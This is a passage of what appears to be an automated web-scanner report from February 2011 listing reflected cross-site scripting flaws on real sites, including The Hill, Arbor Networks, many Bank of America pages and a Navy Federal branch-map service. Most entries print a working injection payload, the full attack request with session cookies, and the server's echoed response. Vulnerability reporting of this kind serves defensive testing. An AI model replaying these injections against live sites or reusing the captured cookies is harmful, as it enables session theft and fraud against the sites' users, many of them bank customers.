<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-moref52a1'><script>alert(1)</script>1f00b24b3b4#comments'> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 was submitted in the REST URL parameter 4. This input was echoed as 84351'><img src=a onerror=alert(1)>b4355392092 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img%20src%3da%20onerror%3dalert(1)>b4355392092 HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:05:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:20:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=4tgmbjdtk4fojqqj58b8p4hiq3; path=/
Connection: close
Content-Length: 74000
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtm ...[SNIP]... <a href='/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more84351'><img src=a onerror=alert(1)>b4355392092#comments'> ...[SNIP]...
The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82c7f"style%3d"x%3aexpression(alert(1))"3660fe20f2a was submitted in the ZCode parameter. This input was echoed as 82c7f"style="x:expression(alert(1))"3660fe20f2a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the ZCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cce12'style%3d'x%3aexpression(alert(1))'28b5d32a9d was submitted in the ZCode parameter. This input was echoed as cce12'style='x:expression(alert(1))'28b5d32a9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 889f8"><script>alert(1)</script>a4569f63444 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76889f8"><script>alert(1)</script>a4569f63444&id=112 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba0d0"><script>alert(1)</script>718295ddb4 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76&id=112ba0d0"><script>alert(1)</script>718295ddb4 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
2.72. http://www.arbornetworks.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.arbornetworks.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 458c5"><script>alert(1)</script>6fafaf87cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_performs&formid=20&Itemid=76&id=112&458c5"><script>alert(1)</script>6fafaf87cd=1 HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4b49"><script>alert(1)</script>f4d8274700e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /creditcardsa4b49"><script>alert(1)</script>f4d8274700e/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:10 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fa1"><script>alert(1)</script>1cb498be8e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /depositse9fa1"><script>alert(1)</script>1cb498be8e3/checksave/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:53 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1655092907.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 491c6"><script>alert(1)</script>20cb5e334dd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /deposits/checksave491c6"><script>alert(1)</script>20cb5e334dd/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:54 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac50f"><script>alert(1)</script>4765bb30cc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /financialtoolsac50f"><script>alert(1)</script>4765bb30cc9/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:36:08 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee12"><script>alert(1)</script>8e3b0539708 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /finditbee12"><script>alert(1)</script>8e3b0539708/locator.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:37 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58bd1"><script>alert(1)</script>2153a6eecc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /help58bd1"><script>alert(1)</script>2153a6eecc8/equalhousing.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:29 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bddc5"><script>alert(1)</script>c62490d0000 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpbddc5"><script>alert(1)</script>c62490d0000/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:25 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1453766315.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec464"><script>alert(1)</script>899a7c53100 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /helpec464"><script>alert(1)</script>899a7c53100/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:33:44 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e1"><script>alert(1)</script>5ff4d40fe3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /loansandhomesa99e1"><script>alert(1)</script>5ff4d40fe3b/index.cfm?template=lc_mortgage HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:35:59 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 864f9"><script>alert(1)</script>190e5f7b296 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /onlinebanking864f9"><script>alert(1)</script>190e5f7b296/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:00 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=1604761259.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88c92"><script>alert(1)</script>201cd186128 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pap88c92"><script>alert(1)</script>201cd186128/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:13 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede62"><script>alert(1)</script>778b0ce2212 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /studentbankingede62"><script>alert(1)</script>778b0ce2212/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:58 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=866563755.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ce"><script>alert(1)</script>45ae18a6011 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle_and_personal_loans544ce"><script>alert(1)</script>45ae18a6011/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 404 Object Not Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:04:20 GMT
Content-type: text/html
Page-Completion-Status: Normal
Connection: close
Set-Cookie: BIGipServerngen-www.80=480687787.20480.0000; path=/
<html> <head> <title>Bank of America</title> <link rel="stylesheet" href="/global/mvc_objects/stylesheet/hs2_mvc_content_style.css" type="text/css"> </head>
The value of the city request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a923</script><script>alert(1)</script>09ca345e6cd was submitted in the city parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=9&zoom=12&zip=&client=navy&city=9a923</script><script>alert(1)</script>09ca345e6cd HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:06:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='9'; var myaddress=''; var mystate=''; var mycity='9a923</script><script>alert(1)</script>09ca345e6cd'; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(12 ...[SNIP]...
The value of the dist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6fe</script><script>alert(1)</script>c091167078b was submitted in the dist parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=96a6fe</script><script>alert(1)</script>c091167078b&zoom=12&zip=&client=navy&city= HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11476
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
var mydist='96a6fe</script><script>alert(1)</script>c091167078b'; var myaddress=''; var mystate=''; var mycity=''; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt( ...[SNIP]...
The value of the zip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17a84</script><script>alert(1)</script>6bbb498c306 was submitted in the zip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?client=navy&zip=17a84</script><script>alert(1)</script>6bbb498c306 HTTP/1.1
Host: www.branchmap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:05:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 11469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script type="text/javascript">
